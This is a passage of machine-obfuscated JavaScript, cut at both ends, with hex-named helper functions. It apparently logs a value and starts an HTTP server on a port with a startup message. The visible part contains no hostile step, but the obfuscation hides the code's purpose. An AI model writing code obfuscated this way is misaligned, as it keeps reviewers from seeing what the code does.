_0x40c303={};_0x40c303[_0xdd838b(0x4a4,0x524,0x540,0x4dd)]=_0x530a25(0x368,0x32b,0x337,0x370)+_0xdd838b(0x5b4,0x67f,0x64f,0x672)+_0x530a25(0x311,0x1d0,0x237,0xe5)+':';const _0x2b652c=_0x40c303;function _0x530a25(_0x290abf,_0x4e7c92,_0xc89256,_0x2d6b75){return _0x51c265(_0xc89256- -0x19a,_0x4e7c92-0x17b,_0x2d6b75,_0x2d6b75-0x1a3);}console[_0xdd838b(0x306,0x4c0,0x30e,0x403)](_0x2b652c['XjnAG'],_0x4ddaf2);}),app[_0x50d979(0x315,0x277,0x1ee,0x279)](PORT,()=>console[_0x50d979(0x2aa,0x3fd,0x30e,0x33f)]('http\x20serve'+_0x51c265(0x42b,0x326,0x56a,0x453)+_0x51c265(0x428,0x3da,0x4ab,0x524)+':'+PORT+'!'));